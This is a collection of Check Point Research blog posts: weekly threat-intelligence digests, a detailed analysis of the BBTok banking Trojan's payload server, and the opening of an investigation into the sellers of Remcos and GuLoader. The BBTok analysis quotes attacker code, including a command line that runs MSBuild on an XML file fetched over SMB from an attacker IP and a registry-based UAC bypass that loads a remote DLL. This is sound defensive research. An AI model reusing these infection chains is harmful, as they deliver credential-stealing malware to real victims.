For the latest discoveries in cyber research for the week of 2nd October, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• Check Point researchers have detected a phishing campaign exploiting popular file-sharing program Dropbox. The threat actors use legitimate Dropbox pages to send official email messages to the victims, which will then redirect the recipients to credential stealing pages.
• Japanese entertainment giant Sony, as well as major Japanese telecom provider NTT Docomo have been the victims of ransomware attacks during the past week. The ‘ransomed.vc’ threat group has assumed responsibility for both attacks and has demanded millions of dollars in ransom from the two companies. The group threatens to sell or leak data exfiltrated in the breaches if its demands are not met.
• American conglomerate Johnson Controls has been hit by ransomware. Ransomware group Dark Angels is demanding $51M from the company in ransom and claims to have exfiltrated more than 25TB of data during the attack. The American Department of Homeland Security is reportedly investigating whether information regarding its facilities had been leaked in the attack, as Johnson Controls is a contractor for the department’s buildings.
• Hong Kong cryptocurrency exchange firm Mixin has disclosed that $200M have been stolen in a breach of its network. According to the firm’s statement, the threat actors have gained access by attacking a database belonging to the company’s cloud provider in order to conduct the theft.
• Russian flight booking vendor Leonardo’s services have been disrupted by a distributed-denial-of-service attack. As a result, multiple Russian airline companies, including the state-owned Aeroflot, were unable to process booking requests. Ukrainian hacktivist collective ‘IT Army of Ukraine’ has claimed responsibility for the attack.
• Kuwait’s Ministry of Finance has acknowledged that its network had been breached in a cyber-attack. The ministry claims that financial data of its employees was not impacted in the attack. Ransomware group Rhysida has assumed responsibility and demands $400,000 in ransom.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware_Win_Rhysida; Ransomware.Wins.Rhysida; Ransomware.win.honey)

• A campaign targeting Azerbaijani entities has been discovered. The threat actors have been using email messages containing supposed information regarding the Azerbaijan-Armenia conflict in Nagorno-Karabakh, which would deliver spyware if opened.

Check Point Threat Emulation provides protection against this threat (Trojan.Wins.SmugHTM.A)

VULNERABILITIES AND PATCHES

• Check Point researchers have discovered multiple critical vulnerabilities affecting the WEB3 social media platform Friend.tech. The set of vulnerabilities can allow attackers to access and modify database values belonging to the company, as well as gain access to paid features.
• Google and Mozilla have published advisories addressing a critical heap buffer overflow vulnerability that affects the companies’ respective internet browser products. The vulnerability, which was assigned CVE-2023-5217, involves the libvpx library’s VP8 video encoding feature, and may affect any product using this library. Google has noted that it is aware of targeted exploitation of the vulnerability in the wild by commercial spyware vendors.
• Six vulnerabilities (CVE-2023-42114-9) have been reported in the Exim mail transfer agent, of which four are considered critical and can allow remote code execution. Exim claims to have developed fixes for three of the vulnerabilities, but two remote code execution flaws remain unpatched. Researchers estimate that at least 250,000 Exim email servers are vulnerable worldwide.
• Software provider Progress has disclosed two critical vulnerabilities affecting its WS_FTP file transfer product. The vulnerabilities CVE-2023-40044 and CVE-2023-42657 allow remote code execution on the underlying operating system of WS_FTP servers. Progress also develops the similar MOVEit managed file transfer product, which was breached in a widespread attack by Cl0p ransomware gang earlier this year.

THREAT INTELLIGENCE REPORTS

• A campaign targeting employees of a Spanish aerospace company has been discovered. The North Korean APT group Lazarus impersonated a Meta recruiter to establish rapport with the victims and delivered ‘coding challenges’ that contained malicious backdoors as part of the ‘recruitment’ process.
• American and Japanese security agencies have published a joint report detailing the activity of Chinese threat actor group BlackTech. The group has attacking entities in the United States and in Japan by targeting Cisco routers to gain initial access and maintain persistence in the target environments.
• Chinese APT group Budworm has been observed targeting an Asian country’s government and a telecom company in the Middle East. The group has used DLL sideloading with the legitimate INISafeWebSSO application to deploy its SysUpdate malware, which serves as a multipurpose backdoor.
• Researchers detail a campaign by unknown threat actors who have managed to compromise hundreds of GitHub repositories. The threat actors gained access using owners’ personal access tokens, and then committed malicious infostealing code disguised as Dependabot, GitHub’s automatic security feature.
• Researchers have analyzed ZenRAT, a RAT with built-in information stealer tools target Windows platforms. The malware is distributed by malicious installers of the BitWarden password manager.

The post 2nd October – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 25th September, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• Monti ransomware gang has claimed responsibility for a cyber-attack on New Zealand’s third-largest university, Auckland University of Technology. The threat actors claim to have stolen 60GB of data, giving the victim a deadline of October 9^th to pay a ransom.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Monti)

• The California-based Software firm Retool has disclosed a data breach that affected 27 clients of the company’s cloud platform. The threat actors behind the attack have gained unauthorized access to the clients’ accounts by performing SMS-based social engineering attack, which caused a damage of $15M in stolen cryptocurrency for at least one client. Recently introduced Google Authenticator sync feature has been blamed by the company for the breach, as it silently switched from multi-factor authentication (MFA) to alleged single-factor authentication.
• The International Criminal Court has been a victim of a cyber-attack affecting its information systems. The ICC has not provided information as to what information may have been taken, and no threat actor has claimed responsibility for the attack yet.
• Greater Manchester Police, one of the largest police departments in the UK, has confirmed a data breach that occurred as a result of a suspected ransomware attack on a third-party identity cards supplier Digital ID. The personal information of approximately 20K police officers has been exfiltrated, however no financial data is believed to be affected.
• The American household cleaning product maker Clorox has suffered a cyber-attack and has shut down its system as a precaution. The attack has resulted in a wide scale disruption to its operations, including product outages and delays.
• Threat actors have obtained limited access to the Canadian airline Air Canada’s internal network, which has affected personal information of its employees. According to the company, clients’ information was not impacted in the attack.
• The government of Nova Scotia has confirmed a data breach that has affected personal information of more than 165K citizens. Most of the data, which was stolen due to the MOVEit file transfer system vulnerability that was utilized by Cl0p gang, consists of sensitive information such as social insurance numbers and banking information.

VULNERABILITIES AND PATCHES

• Apple has addressed three patches for vulnerabilities (CVE-2023-41991, CVE-2023-41992 and CVE-2023-41993) in Apple’s security framework, Apple’s kernel framework and Apple’s WebKit web browser engine, which impact various versions of Apple products. Among others affected, the first two flaws impact the Apple Watch Series 4 and later, and the third impacts macOS Monterey.
• GitLab has fixed a high severity vulnerability (CVE-2023-5009), affecting various versions of GitLab EE starting from 13.12 to 16.2.7, and 16.3 to 16.3.4. This flaw allows an attacker to execute pipelines as an arbitrary user through the misuse of scheduled security scan policies.
• Atlassian has released its September 2023 Security Bulletin, which includes patches for several vulnerabilities (CVE-2022-25647, CVE-2023-22512, CVE-2023-22513, and CVE-2023-28709). A malicious cyber actor could exploit some of these vulnerabilities to take control of an affected system.

THREAT INTELLIGENCE REPORTS

• Check Point Research has discovered new version of the BBTok banking malware, which targets clients of over 40 Mexican and Brazilian banks. The research highlights newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins), which results in low detection rates. The research also reveals some of the threat actor’s server-side resources used in the attacks, targeting hundreds of users in Brazil and Mexico.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Banker.Wins.BBTok; Banker.Win.BBTok; Technique.Wins.SuxXll; Trojan.Win.XllAddings)

• Check Point Research has exposed threat actor going by the moniker “EMINэM”, which is responsible for selling and promoting dual use agents Remcos and GuLoader. The research shows the strong links identified between those agents, and proves that the sellers of Remcos and GuLoader are clearly aware that their tools are embraced by cybercriminals.

Check Point Threat Emulation provides protection against this threat (Dropper.Win.CloudEyE; Dropper.Win.Guloader; RAT.Win.Remcos)

• The China-based threat actor Earth Lusca’s (aka CHROMIUM) employs a Linux-based backdoor variant dubbed SprySOCKS, originating from the open-source Windows backdoor Trochilus. In addition, the implementation of SprySOCKS interactive shell is likely inspired from the Linux variant of the Derusbi malware.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Trojan.Wins.Derusbi; Trojan.Win.Winnti; RAT.Wins.Shadowpad)

The post 25th September – Threat Intelligence Report appeared first on Check Point Research.

Introduction

Check Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker in Latin America. In the research, we highlight newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins). This resulting in low detection rates, even though BBTok banker operates at least since 2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks, targeting hundreds of users in Brazil and Mexico.

The server-side components are responsible for serving malicious payloads that are likely distributed through phishing links. We’ve observed numerous iterations of the same server-side scripts and configuration files which demonstrate the evolution of the BBTok banker deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet implemented, as well as trace the origins of the source code employed for sustaining such operations.

In this report, we highlight some of the server-side functionalities of the payload server which are used to distribute the banker. Those allow to generate unique payloads to each of the victims, generated upon a click.

Key Findings

1. BBTok continues being active, targeting users in Brazil and Mexico, employing multi-layered geo-fencing to ensure infected machines are from those countries only.
2. Since the last public reporting on BBTok in 2020, the operators’ techniques, tactics and procedures (TTPs) have evolved significantly, adding additional layers of obfuscation and downloaders, resulting in low detection rates.
3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number.
4. The newly identified payloads are generated by a custom server-side application, responsible for generating unique payloads for each victim based on operating system and location.
5. Analysis of payload server-side code revealed the actors are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL.
6. The threat actors add open-source code, code from hacking forums, and new exploits when those appear (e.g. Follina) to their arsenal.

Background

The BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set of functionalities, including enumerating and killing processes, keyboard and mouse control and manipulating clipboard contents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages to a wide variety of banks operating in Mexico and Brazil.

Since it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still primarily utilizing phishing emails with attachments for the initial infection. Recently we’ve seen indications of the banker distributed through phishing links, and not as attachments to the email itself.

Upon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machines. Those contain an LNK file that kicks off the infection chain, leading to the deployment of the banker while opening a decoy document. Although the process appears to be quite straightforward upon first glimpse, we’ve found evidence that there’s a lot going on behind the scenes.

While analyzing these newly identified links, we’ve uncovered internal server-side resources used to distribute the malware. Looking at those, it became evident the actor has maintained a much wider variety of infection chains, generated on demand with each click, tailored to match the victim’s operating system and location.

BBTok Banking Hijacks

BBTok enables its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan capabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks in Mexico and Brazil, such as Citibank, Scotibank, Banco Itaú and HSBC (see Appendix B for the full list of targeted banks). The banker searches for indications of its victims being clients of those banks by iterating over the open windows and names of browser tabs, searching for bank names.

The default target the banker apparently aims at is BBVA, with the default fake interface aiming to replicate its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details. The focus of this functionality is tricking the victim into entering the security code/ token number that serves as 2FA for bank account and to conduct account takeovers of victim’s bank account. In some cases, this capability also aims to trick the victim into entering his payment card number.

BBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these fake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer screen and a specific form for the bank of the victim, without raising suspicion. BBVA, which is the default bank the banker targets, has its interface stored in one such form named “TFRMBG”. In addition to Banking sites, the attackers have kept up with the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking for strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.

BBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser extension or inject a DLL named “rpp.dll” to further its hold on the infected system, and likely to improve its capabilities to trick the victims. Those were not available during the time of analysis.

What’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its C2 server, and are not automatically carried out on every infected system.

Payload Server Analysis

Overview of the Payload Server

To effectively manage their campaign, the BBTok operators created a unique flow kicked off by the victim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, it results in the download of either a ZIP archive or an ISO image, depending on the victim’s operating system. Although the process is seamless for the victim, the server generates a unique payload based on parameters found within the request.

This process is carried out on a XAMPP-based server, and contains three essential components:

1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure archives.
2. A PHP codebase and database designed to document and manage infections.
3. Auxiliary utilities that enhance the functionality of these components.

This is the chain of events:

1. A victim performs an HTTP request to either /baixar, /descargar or /descarga (these paths suggest that the lures are in either Spanish or Portuguese).
2. Based on the .htaccess file, the server handles the request using descarga.php.
3. The scripts utilize the file db.php to store information via an SQLite database about the request, including the victim’s fingerprint.
4. Descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually delivered to the victim.

Incoming Requests Handling

The PHP codebase is composed of the following files:

1. descarga / descargar.php – Manages new connections and serves lure documents to the victim’s PC.
2. db.php – Generates and manages the SQLite database that includes the victim’s details.
3. generator.php – Utility class used to generate random links, strings, and other functionalities.

“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process. The script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the attackers’ origin.

The script logic:

1. It checks the geolocation of the link-referred victim against ip-api.com and stores it in a file. If the victim isn’t from a targeted country (i.e., Mexico or Brazil) the HTTP connection ends immediately with a 404 message.

$api = new IpApi();
$whoAmI = $api->GetInfo($ip);
$allowed = array("MX", "BR");
file_put_contents("ips/".$ip.$whoAmI->countryCode, "");
if(!in_array($whoAmI->countryCode, $allowed)) {
    http_response_code(404);
    die();
}

2. If the victim passes the check, the script then parses the user agent to get the victim’s Windows OS version.

$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));
$match = false;
$dfile = "10";
$dfiles = array (
    'windows nt 10.0' => '10',
    'windows nt 6.3' => '10',
    'windows nt 6.2' => '10',
    'windows nt 6.1' => '7',
    'windows nt 6.0' => '7',
    'windows nt 5.2' => '7'
);
foreach($dfiles as $os=>$file) {
    if (preg_match('/' . $os . '/i', $useragent)) {
        $match = true;
        $dfile = $file;
        break;  
    }
}

3. It then passes the user agent with the victim’s country code and lure filename to the PowerShell payload generator script.

PowerShell Payload Generator

The script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest version of the code has a lot of commented-out sections that were likely functional in the past, which suggests they contain additional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating that this operation has been ongoing for quite a while.

Our analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the section “Earlier Versions.”

The generator script is called by descarga.php, using the function DownloadFile with the arguments file_name, ver and cc. These correspond to the generated archive name, the victim’s OS version and the victim’s country code.

 function DownloadFile($file_name, $ver, $cc) {
    if($ver == "10" )
    {
        $ext = "iso";
    } else {
        $ext = "zip";
    }
    exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);
    return $file_name.'.'.$ext;
}

The code portions utilized in the observed iteration of the server generate the archive payloads based on two parameters:

1. The origin country of the victim – Brazil or Mexico.
2. Operating System extracted from the User-Agent – Windows 10 or 7.

According to the results, the following parameters of the malicious archive are selected:

1. Type of the archive: ISO for Windows 10, ZIP for Windows 7, and others.
2. The name of the DLL file that is used in the next stage changes according to the targeted country: Trammy is used for Brazil, and Gammy is used for Mexico.
3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by Microsoft Edge, and the one for Windows 7 is used by Google Chrome.
4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file named dat.xml from the server 216[.]250[.]251[.]196, which also stores the malicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant remote DLL via CMD execution.

$shortcutName = $args[0]
$win = $args[1]
$country = $args[2]
$stegoKey = New-StegoKey 35

if($country -eq "BR") {
    $dllName = 'Trammy'
} else {
    $dllName = 'Gammy'
}

if($win -eq "10") {
    $wstate = 7
    $shortcutIconLocation =  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    CopyMSBuild($shortcutName)
} else {
    $wstate = 7
    $shortcutIconLocation =  "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
}

Add-PoshObfuscation

All payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single result from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This individual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:

Infection Chains and Final Payload

The process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for Windows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection mechanisms such as AMSI.

*ammy.dll Downloaders

Both infection chains utilize malicious DLLs named using a similar convention – Trammy, Gammy, Brammy, or Kammy. The latter are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any malicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes packed with multiple additional password-protected software. These allow the actors full access to the infected machine, and additional functionalities.

Windows 7 Infection Chain

The infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads, extracts, and runs the BBTok payload.

Windows 10 Infection Chain

The infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the commands in the following manner:

DANFE352023067616112\DANFE352023067616112.exe /c copy %cd%\DANFE352023067616112\DANFE352023067616112.pdf %userprofile%\DANFE352023067616112.pdf /Y & start %userprofile%\DANFE352023067616112.pdf & C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\216.250.251.196\file\dat.xml

The infection chain:

1. Copy the lure file to the folder %userprofile% and open it.

2. Run MSBuild.exe to build an application using an XML stored on a remote server, fetched over SMB.
3. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with a renamed rundll32.exe(mmd.exe), as seen in the XML contents:

private void ByFD() {
    String reg = "/c REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d \"C:\\ProgramData\\mmd.exe \\\\216.250.251.196\\file\\Trammy.dll, Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f & REG DELETE HKCU\\Software\\Classes\\.pwn /f\" /f & REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f & timeout /t 3 >nul & start /MIN computerdefaults.exe"; 
    StartProcess("cmd.exe", reg); }

4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.

The unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the Windows 10 infection chains.

Earlier Versions

Throughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server. We saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.

Changes in the PHP Code

Looking at an earlier version of the descarga.php script, we saw a few key differences:

1. Originally, only victims from Mexico were targeted.
2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the script.
3. Instead of executing the PowerShell script directly, a script named gen.php was called. We were unable to obtain this script, but believe it simply executed the PowerShell script.
4. The victim’s IP address, user agent, and a flag (jaBaixou, or ‘already downloaded’ in Portuguese) were inserted into a database, using the db.php file. The flag is later checked to not serve the same payload twice.

As this section is not used in the latest version, it is possible that the attackers found this process cumbersome and decided to trade OPSEC for easier management and a higher chance of infection success.

Modifications of the PowerShell Script

Looking at older versions of the PowerShell script, it was clear that numerous changes were done to the payload and execution chain. Some noteworthy ones include:

1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1.
2. A later update added the lure PDF, fac.pdf (“fac” is an abbreviation of “factura”, which is “invoice” in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican government site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.
3. The newest version we found opens a different legitimate site, hxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes the XML file used by MSBuild and changes the name of the DLL reserved for Brazilian targets from Brammy.dll to Trammy.dll.

Unused Code and Infection Vectors

Certain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the primary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:

1. ze.docx is a document that exploits the Follina CVE (2022-30190). It is referenced in the PowerShell script in a function named CreateDoc.
2. xll.xll, which is referenced by CreateXLL, is a malicious xll taken from the open-source project https://github.com/moohax/xllpoc, which implements code execution via Excel.
3. Numerous empty JavaScript files were found on the server, likely to be used by a function named CreateJS. The file referenced in the function, b.js, was empty, so it is unclear whether this function was previously used or was never fully implemented.
4. Multiple bat files were located on the server, each with a different implementation of downloading next stages. These were most likely created by a function named CreateBat, which is commented out in the latest version of the PowerShell script. Most of them are almost identical to the code in the ByFD function we analyzed previously, excluding two noteworthy past iterations:
   1. The oldest bat file downloaded another PowerShell script as a next stage (which wasn’t publicly available anymore) instead of editing the registry;
   2. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one which is currently being used.

Victimology and Attribution

Our analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’ side, based on a database we found that documents access to the malicious application. The database is named links.sqlite and is pretty straightforward. It contains over 150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note the use of the Portuguese language and the names of the 4 rows:

1. chave, or key;
2. assunto, or subject;
3. user_agent ;
4. baixou, or downloaded.

The column named chave contained the IP addresses of the victims, and the column assunto was empty:

As the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in Portuguese, we believe this indicates that with a high probability the threat actors are Brazilians, which is known for its active banking malware eco-system.

Conclusion

Although BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.

It is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are constantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and opportunities. To keep up and protect against future attacks, security researchers must do the same.

Check Point Protections

Check Point Threat Emulation:

• Banker.Wins.BBTok.A
• Banker.Win.BBTok.B
• Technique.Wins.SuxXll.A
• Trojan.Win.XllAddings.A

Harmony Endpoint:

• Trojan.Win.Generic.AQ
• Trojan.Win.Generic.AR

Appendix A – IOCs

Files

Network Indicators

Appendix B – List of Targeted Banks

The post Behind the Scenes of BBTok: Analyzing a Banker’s Server Side Components appeared first on Check Point Research.

Introduction

In a recent disturbing development, software advertised as legitimate has become the weapon of choice for cybercriminals. Two notable examples of this behavior are the Remcos RAT (remote administration tool) and GuLoader (also known as CloudEyE Protector).

These programs, which are positioned as legitimate tools, are constantly used in attacks and occupy top positions in the most prevalent malware rankings. While the sellers state that these tools should only be employed lawfully, a deeper truth is that their primary customers are none other than cybercriminals.

Figure 1 – Remcos and GuLoader rankings in the Top 10 Wanted Malware

In our new study, we found a strong link between these dual-use agents. As Remcos is easily detected by antivirus solutions, it is difficult to use for criminal purposes. However, GuLoader can be used to help Remcos bypass anti-virus protection. During our research, we discovered that GuLoader is now sold under a new name on the same platform as Remcos and is implicitly promoted as a crypter that makes its payload fully undetectable by antiviruses (FUD). In addition, the administrator who oversees this platform also manages the BreakingSecurity website, which is the official website of Remcos RAT and related Telegram channels. We found evidence that the individual behind the Remcos and GuLoader sales personally uses malware such as Amadey and Formbook, and also uses GuLoader as protection against antivirus detection. Domain names and IP addresses associated with the Remcos and GuLoader seller appear in malware analyst reports.

These revelations lead us to the conclusion that the sellers of Remcos and GuLoader are clearly aware that their tools are embraced by cybercriminals, despite their protestations of innocence. Our investigation culminates in the exposure of the individual responsible for selling Remcos and GuLoader, unveiling their social networks and shedding light on the substantial monthly income generated through these illicit activities.

GuLoader & Remcos

More than three years since it first appeared, GuLoader continues to pose problems for both regular users and antivirus software developers. It is worth recalling that GuLoader is a highly protected shellcode-based loader that employs numerous techniques to prevent both manual and automated analysis. In addition, in recent samples, a multi-stage loading of code fragments from remote servers is utilized through the use of .LNK files, VBS, and PowerShell scripts. The combination of these techniques allows GuLoader samples to achieve a zero-detection rate on VirusTotal and deliver any malicious payload onto the victim’s computer.

In 2020, we exposed an Italian company that was selling the CloudEyE product through the website securitycode.eu and revealed its direct affiliation with GuLoader. Our findings forced the creators of CloudEyE to temporarily suspend their operations. On their website, they posted a message saying that their service is designed to protect intellectual property, not to spread malware.

Figure 2 – Official statement about CloudEyE suspension on the securitycode.eu website.

After a few months passed, their website resumed the sale of CloudEyE. Soon afterwards, we observed an increase in the number of new GuLoader attacks in our telemetry, as well as the appearance of new versions. Currently, we monitor dozens of new GuLoader samples on a daily basis.

Figure 3 – Number of attacks involving GuLoader per day in the last 6 months.

In our previous article about the latest versions of GuLoader, we purposefully omitted any connection between CloudEyE and the new version of GuLoader because we observed the distribution of GuLoader under an alternative name “The Protector” on the website named “VgoStore.”  VgoStore, as it turns out, is closely related to Remcos.

Remcos is a well-known remote surveillance tool, marketed for supposedly legitimate tracking and monitoring purposes. Since its appearance in 2016, we have been monitoring Remcos in many phishing campaigns. In addition to its typical remote administration tool features, Remcos includes uncommon functionalities such as man-in-the-middle (MITM) capabilities, password stealing, tracking browser history, stealing cookies, keylogging, and webcam control.  These features go beyond the typical scope of a RAT and suggest a more intrusive and malicious intent.

The start of our investigation

After the disappearance of CloudEyE ads on hacker forums, we began to look for any mention of CloudEyE Protector on the Internet. On the first page of the Google search results we found a link to the Utopia project website, where CloudEyE Protector is listed in the “Merchants” section right after BreakingSecurity – the official website of the Remcos RAT:

Figure 4 – BreakingSecurity and CloudEyE advertisements on the Utopia website.

We also paid attention to the fact that in 2022-2023, the number of Remcos samples amounted to almost a quarter of all successfully decrypted GuLoader payloads for which we were able to identify a malware family.

Figure 5 – Identified GuLoader payloads.

In other words, in the past year Remcos has become the most common malware distributed using GuLoader. As we will show, this is not a coincidence.

VGO TheProtect – the new brand for GuLoader

The marketing and sales of Remcos were first conducted on hacking forums and later sold on a dedicated website called BreakingSecurity[.]net. Starting in 2022, it became possible to find Remcos sales on another website called VgoStore[.]net. VgoStore is advertised as an official reseller of Remcos in the @BreakingSecurity_Group Telegram group, which is run by the moderator nicknamed “EMINэM” (usernames @breakindsecurity, @emin3m, @Break1ngSecurir1ty):

Figure 6 – VgoStore ads on the BreakingSecurity Telegram group by EMINэM.

At VgoStore, in addition to BreackingSecurity’s Remcos, you can also find a full package for malicious distribution and initial access tool kits, such as “Excel and Doc Exploit”, LNK Exploit, RDP accounts, private DNS, crypters, and so on. Such tools are marked as “educational.”

Among these tools, our attention was drawn to TheProtect (Private Protecting Service):

Figure 7 – TheProtect is one of the tools sold on the VgoStore website.

In addition to the @BreakingSecurity_Group Telegram group, EMINэM also maintains a Telegram group for VgoStore called @VgoStore_Group. In those groups, EMINэM and another administrator “VGO” pushed TheProtect whenever users asked for a crypting service. It is also worth noting that in one message TheProtect is mentioned by EMINэM as a tool that helps Remcos bypass Windows Defender (WD):

Figure 8 – TheProtect is advertised in BreakingSecurity and VgoStore Telegram groups.

At the same time, in the BreakingSecurity Telegram group, administrators seemingly try to distance themselves from malicious activity, saying that they only provide a way to whitelist Remcos for antivirus, but not bypass the protection. As opposed to the VgoStore group, where TheProtect is advertised as a service that provides “runtime FUD” (that is, completely undetectable by antiviruses when sample is executed):

Figure 9 – Messages posted by VGO and EMINэM in BreakingSecurity and VgoStore Telegram groups.

TheProtect has two protection methods: Private Protect and Script Protect:

Figure 10 – TheProtect protection methods.

According to the VgoStore website, the provided file for the Script Protect is VBS instead of an EXE file.

The term “Private Protect” can be misleading, as it may give the impression that each customer receives a unique tool. However, upon further examination of the videos in VgoStore’s Telegram group and YouTube channel, it becomes apparent that there are two types of encryption services are available: one based on NSIS (Nullsoft Scriptable Install System), and another based on VBS (Visual Basic Scripting).

This struck us as suspiciously similar to the most common GuLoader variants, one of which is a VBS variant and the second one is an NSIS variant.

We should note that Script Protect is extremely expensive. It is sold at $7000 for 4 protected files in the 30-day period. For both Script Protect and Private protect, they state “We reserve 3 days max to provide the protected software.” This made us think that the protection process is not fully automated. This means that buyers likely do not receive the builder that automatically produces protected files, as was done in the case of CloudEyE.

TheProtect VBS variant

As we wrote previously, VgoStore has a Telegram group @VgoStore_Group where product updates are published, and clients can get support. In this group, administrators often post videos demonstrating their product features.

Figure 11 – VgoStore Telegram group.

In one of the videos (https://t.me/VgoStore_Group/13729) published in this group on March 5, 2023, by the user @VgoStore, they demonstrate an attack using an LNK file disguised as a PDF.

Figure 12 – Video published in the VgoStore Telegram group.

In this video, we see how clicking on an LNK file causes the new process “eilowutil.exe” to initiate a TCP connection with the remote server “84.21.172.49:1040“. Before launching the LNK file, the video shows that all Windows Defender features are enabled, and Windows Defender did not raise any alerts throughout the execution.

The video provided significant details about the sample being tested, which allowed us to restore the complete attack chain. At the 01:13 mark, we can briefly see the command line of the powershell.exe process displayed by Process Hacker. This allowed us to identify the sample demonstrated in this video (SHA256: c914dab00f2b1d63c50eb217eeb29bcd5fe20b4e61538b0d9d052ff1b746fd73) and find it on VirusTotal using behavior search query:

Figure 13 – Process command line demonstrated on the video allowed us to find a related sample on VirusTotal.

When we downloaded the script, we found that it is similar to the VBS variant of GuLoader that we described in our article Cloud-Based Malware Delivery: The Evolution of GuLoader. The only difference with the version we described in our previous article is that the shellcode is embedded in the VBScript in the BASE64-encoded form and then placed into the registry:

Figure 14 – BASE64-encoded encrypted data stored in the registry.

Another part of the VBScript contains a PowerShell script with two layers of obfuscation. The script contains the strings that were observed in the screenshot from the video, which were used to identify this malicious sample ($Tjringernes =, Diu;DyrFAttuEncnNatcWootLobiLsioReknUnd):

Figure 15 – Part of the VBS containing an obfuscated PowerShell script.

After the deobfuscation, we got the following code:

Figure 16 – Deobfuscated PowerShell script.

This code loads base64-encoded data from the registry, decodes and runs it using the CallWindowProcA API function in the same way as described in the article Cloud-Based Malware Delivery: The Evolution of GuLoader. The first 645 bytes of this code are not encrypted and contain the code of the decrypter. The rest of the data contains the encrypted shellcode.

Our tools for automated analysis of malicious samples identified the encrypted data as GuLoader and successfully decrypted the shellcode, including the GuLoader configuration, the URL for downloading the payload, and the payload decryption key:

Figure 17 – Decrypted GuLoader configuration.

